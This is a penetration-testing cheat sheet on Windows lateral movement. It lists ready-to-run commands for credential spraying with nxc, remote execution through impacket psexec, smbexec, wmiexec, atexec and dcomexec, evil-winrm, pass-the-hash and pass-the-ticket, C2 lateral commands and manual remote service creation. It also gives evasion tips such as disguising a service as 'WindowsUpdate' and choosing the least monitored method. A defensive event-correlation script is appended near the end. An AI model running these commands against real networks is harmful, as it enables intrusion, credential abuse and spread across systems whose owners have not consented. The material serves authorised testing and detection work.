Lateral Movement


Move from one Windows host to the next. Most techniques need creds (a password, an NTLM hash, or a Kerberos ticket). Tickets and trust attacks live in AD MOC.

T=10.10.11.50
USER=Administrator
PASS='Passw0rd!'
NTHASH='8846f7eaee8fb117ad06bdd830b7586c'
DOMAIN=corp.local

i. Decision matrix

What you have -> what to use:

Auth                                 | Best tool
-------------------------------------|--------------------------------------------------
User + password                      | nxc / impacket-psexec / evil-winrm
Username + NTLM hash                 | nxc -H / impacket-psexec -hashes / evil-winrm -H
Kerberos TGT (.ccache)               | KRB5CCNAME= + impacket -k -no-pass
TGS for a specific service           | KRB5CCNAME= + same flags
Token of an existing logged-on user  | runas / token::elevate (mimikatz)

What’s open on the target -> what to use:

Port                       | Method
---------------------------|-----------------------------------
445 (SMB)                  | psexec / smbexec / Pass-the-Hash
135 + 49152+ (DCOM/RPC)    | wmiexec / dcomexec / atexec
5985 / 5986 (WinRM)        | evil-winrm
3389 (RDP)                 | xfreerdp / mstsc /restricted-admin

ii. NXC, the swiss army knife

Spray a cred set across many hosts at once:

nxc smb 10.10.11.0/24 -u "$USER" -p "$PASS"
nxc smb 10.10.11.0/24 -u "$USER" -H "$NTHASH"
nxc smb 10.10.11.0/24 -u "$USER" -p "$PASS" --local-auth     ## local account, not domain

Result indicators in the output:

  • [+] with (Pwn3d!) = you’re admin on that host
  • [+] without (Pwn3d!) = creds valid but no admin

Once you have admin, execute commands directly:

nxc smb "$T" -u "$USER" -p "$PASS" -x "whoami"
nxc smb "$T" -u "$USER" -H "$NTHASH" -X "Get-Process"     ## PowerShell
## Spawn full shell:
nxc smb "$T" -u "$USER" -p "$PASS" --exec-method smbexec -x cmd

WinRM mode:

nxc winrm "$T" -u "$USER" -p "$PASS"
nxc winrm "$T" -u "$USER" -p "$PASS" -x "whoami"

iii. PsExec via impacket

Creates a service on the target that runs your command as SYSTEM. Very loud (logs a System Event ID 7045 service-install event) but reliable.

impacket-psexec "$DOMAIN/$USER":"$PASS"@"$T"
impacket-psexec -hashes :"$NTHASH" "$DOMAIN/$USER"@"$T"

With a custom service name to be less obvious:

impacket-psexec -service-name "WindowsUpdate" "$DOMAIN/$USER":"$PASS"@"$T"

iv. SMBExec (psexec without dropping a binary)

Uses cmd.exe redirection to talk through SMB pipes. No service binary on disk:

impacket-smbexec "$DOMAIN/$USER":"$PASS"@"$T"
impacket-smbexec -hashes :"$NTHASH" "$DOMAIN/$USER"@"$T"

Quieter than psexec, slightly less stable.

v. WMIExec

DCOM-based, no service install, no SMB pipe. Often slips past where SMB-based fails:

impacket-wmiexec "$DOMAIN/$USER":"$PASS"@"$T"
impacket-wmiexec -hashes :"$NTHASH" "$DOMAIN/$USER"@"$T"

Needs port 135 plus the dynamic high port range (49152+) open. Often the most stealth-friendly of the impacket bunch.

vi. AtExec (Task Scheduler)

Spawns a scheduled task, runs it once, deletes it. Useful when WMI is blocked:

impacket-atexec "$DOMAIN/$USER":"$PASS"@"$T" "whoami"
impacket-atexec -hashes :"$NTHASH" "$DOMAIN/$USER"@"$T" "whoami"

Non-interactive, returns command output only.

vii. DCOMExec

Same idea as WMIExec but via other DCOM objects (MMC20.Application, ShellWindows, ShellBrowserWindow):

impacket-dcomexec "$DOMAIN/$USER":"$PASS"@"$T"
impacket-dcomexec -object ShellWindows "$DOMAIN/$USER":"$PASS"@"$T"

Tries multiple DCOM objects automatically. Useful when one is blocked.

viii. Evil-WinRM (PSRemoting)

The cleanest Windows-to-Windows feel. Real PowerShell session, no service install, no scheduled task:

evil-winrm -i "$T" -u "$USER" -p "$PASS"
evil-winrm -i "$T" -u "$USER" -H "$NTHASH"

Built-in helpers inside the shell:

*Evil-WinRM* PS> upload /local/file C:\Windows\Temp\file
*Evil-WinRM* PS> download C:\Windows\Temp\file /local/file
*Evil-WinRM* PS> menu                          ## load PS modules
*Evil-WinRM* PS> Invoke-Binary /local/sh.exe   ## run binary from local disk on remote box

If 5985 is filtered, try 5986 (HTTPS):

evil-winrm -i "$T" -u "$USER" -p "$PASS" -S -P 5986

ix. Pass-the-Hash (PtH)

Use NTLM hash instead of password. Works with most of the above (impacket, nxc, evil-winrm). RDP requires Restricted Admin Mode enabled on target:

xfreerdp /v:"$T" /u:"$USER" /pth:"$NTHASH" /restricted-admin /dynamic-resolution

Check if Restricted Admin is enabled:

nxc smb "$T" --rid-brute   ## checks include this on modern nxc
## or directly:
nxc rdp "$T" -u "$USER" -H "$NTHASH"

x. Pass-the-Ticket (PtT)

When you have a Kerberos TGT or TGS in .ccache format, point impacket at it with -no-pass -k:

export KRB5CCNAME=/tmp/user.ccache
impacket-psexec -k -no-pass "$DOMAIN/$USER"@host.corp.local
impacket-wmiexec -k -no-pass "$DOMAIN/$USER"@host.corp.local

You must reference the host by FQDN (Kerberos is hostname-based), not by IP.

From Windows with Rubeus (PtT in-memory):

Rubeus.exe ptt /ticket:base64encodedticket
klist

The full Kerberos abuse chain lives in AD MOC.

xi. Lateral via RDP

If you have GUI access and don’t want to drop tools, RDP with creds:

xfreerdp /v:"$T" /u:"$USER" /p:"$PASS" /dynamic-resolution /drive:share,/tmp

/drive:share,/tmp mounts your /tmp as a share on the target so you can copy files in/out via the RDP channel.

Hash auth (Restricted Admin only):

xfreerdp /v:"$T" /u:"$USER" /pth:"$NTHASH" /restricted-admin

RDP leaves traces

RDP creates Security 4624 logon events with logon type 10 (RemoteInteractive). Loud on monitored networks. Avoid on real engagements unless approved.

xii. Sliver / Cobalt Strike / Havoc lateral

C2 frameworks have built-in lateral commands that use the same primitives (service creation, WMI):

sliver > psexec --hostname target
sliver > wmi --hostname target --command "whoami"
beacon> jump psexec64 target session
beacon> remote-exec wmi target whoami

These wrap impacket/PowerShell with the C2’s session injection so the lateral spawn is already a beacon. Best option on real engagements when you’ve got the infra.

xiii. SCM remote service create (manual)

When automated tools fail and you have admin via SMB, build a service by hand:

sc.exe \\target create newsvc binPath= "C:\Windows\Temp\sh.exe" start= auto
sc.exe \\target start newsvc
sc.exe \\target delete newsvc

xiv. PowerShell remoting one-off

When you don’t want a full evil-winrm session:

$cred = New-Object PSCredential ("$DOMAIN\$USER", (ConvertTo-SecureString "$PASS" -AsPlainText -Force))
Invoke-Command -ComputerName "$T" -Credential $cred -ScriptBlock { whoami; hostname }
Enter-PSSession -ComputerName "$T" -Credential $cred

xv. Watch what you trigger

Lateral activity is logged everywhere. Quick reference of what each method generates:

Method           | Event source            | Common ID
-----------------|-------------------------|------------------------------------
PsExec (service) | System                  | 7045 (service install)
SMBExec          | Security + System       | 4624 + 7045
WMIExec          | WMI-Activity + Security | 5857 + 4624
AtExec           | Task Scheduler          | 106 (task created) + 200 (task ran)
DCOMExec         | WMI/DCOM                | 4624 + DCOM events
WinRM            | WinRM + Security        | 4624 (type 3) + WinRM operational
RDP              | Security                | 4624 (type 10) + RDPCoreTS

On real engagements, pick the method based on what’s least monitored. On labs, pick what’s most reliable.
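Seen from the blue side, the table above is a correlation recipe: a network logon (4624 type 3) on a host followed within seconds by a service install (7045), a scheduled-task registration (106) or a WMI provider start (5857) is the footprint of the corresponding remote-exec method, while a 4624 type 10 is RDP on its own. The script below is an added example, not part of the original notes, that applies exactly that logic to constructed sample event records. The event dicts are a simplified shape assumed for the example (not parsed EVTX); the channel names are the standard Windows log names, and the hosts, IPs and timestamps are made up.

```python
"""Correlate simplified Windows event records into the lateral-movement
footprints from the "Watch what you trigger" table.

Added example: the event shape (dict with time/host/channel/id/logon_type/src)
is an assumption for illustration, not a real log parser.
"""
from datetime import datetime, timedelta

# Follow-on events that, shortly after a network logon on the same host,
# indicate a remote-execution method.  (channel, event id, description)
RULES = [
    ("System", 7045,
     "service install after network logon (PsExec/SMBExec pattern)"),
    ("Microsoft-Windows-WMI-Activity/Operational", 5857,
     "WMI provider start after network logon (WMIExec pattern)"),
    ("Microsoft-Windows-TaskScheduler/Operational", 106,
     "scheduled task registered after network logon (AtExec pattern)"),
    ("Microsoft-Windows-WinRM/Operational", None,   # any WinRM operational event
     "WinRM activity after network logon (PSRemoting pattern)"),
]

# Constructed sample events (not real log data).
SAMPLE_EVENTS = [
    # WS01: network logon, then a service install two seconds later
    {"time": "2024-05-01T10:00:00", "host": "WS01", "channel": "Security",
     "id": 4624, "logon_type": 3, "src": "10.10.11.5"},
    {"time": "2024-05-01T10:00:02", "host": "WS01", "channel": "System", "id": 7045},
    # WS02: RemoteInteractive (RDP) logon, a finding by itself
    {"time": "2024-05-01T10:05:00", "host": "WS02", "channel": "Security",
     "id": 4624, "logon_type": 10, "src": "10.10.11.5"},
    # WS03: network logon followed by task registration and task run
    {"time": "2024-05-01T10:10:00", "host": "WS03", "channel": "Security",
     "id": 4624, "logon_type": 3, "src": "10.10.11.5"},
    {"time": "2024-05-01T10:10:01", "host": "WS03",
     "channel": "Microsoft-Windows-TaskScheduler/Operational", "id": 106},
    {"time": "2024-05-01T10:10:02", "host": "WS03",
     "channel": "Microsoft-Windows-TaskScheduler/Operational", "id": 200},
    # WS04: service install with no preceding network logon -> not flagged
    {"time": "2024-05-01T11:00:00", "host": "WS04", "channel": "System", "id": 7045},
    # WS05: network logon, but the service install is 10 minutes later -> outside window
    {"time": "2024-05-01T12:00:00", "host": "WS05", "channel": "Security",
     "id": 4624, "logon_type": 3, "src": "10.10.11.9"},
    {"time": "2024-05-01T12:10:00", "host": "WS05", "channel": "System", "id": 7045},
]


def _ts(ev):
    return datetime.fromisoformat(ev["time"])


def classify(events, window=timedelta(seconds=60)):
    """Return findings as (host, source_ip, description), in time order.

    A follow-on event is only attributed to a network logon when it lands on
    the same host within `window` of that logon; this keeps routine local
    service installs or task registrations out of the results.
    """
    findings = []
    last_net_logon = {}          # host -> (logon time, source ip)
    for ev in sorted(events, key=_ts):
        host, chan, eid = ev["host"], ev["channel"], ev["id"]
        if chan == "Security" and eid == 4624:
            lt = ev.get("logon_type")
            if lt == 3:
                last_net_logon[host] = (_ts(ev), ev.get("src", "?"))
            elif lt == 10:
                findings.append((host, ev.get("src", "?"),
                                 "RDP (RemoteInteractive) logon"))
            continue
        for rule_chan, rule_id, label in RULES:
            if chan == rule_chan and (rule_id is None or eid == rule_id):
                logon = last_net_logon.get(host)
                if logon and _ts(ev) - logon[0] <= window:
                    findings.append((host, logon[1], label))
                break
    return findings


if __name__ == "__main__":
    for host, src, desc in classify(SAMPLE_EVENTS):
        print(f"{host:6} from {src:12} {desc}")
```

The 60-second window is a tuning knob: tools in this section fire the follow-on event within a second or two of the logon, so a short window keeps false positives from unrelated admin activity low while still catching each method in the table.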

xvi. After lateral, repeat

You moved to a new box. Start over at Local Enum, dump creds with PrivEsc - Credentials & Files, and find more lateral targets. The lateral loop continues until you reach the goal (DA, domain trust, etc.).

See AD MOC for the AD-specific lateral patterns (DCSync, ACL chains, delegation).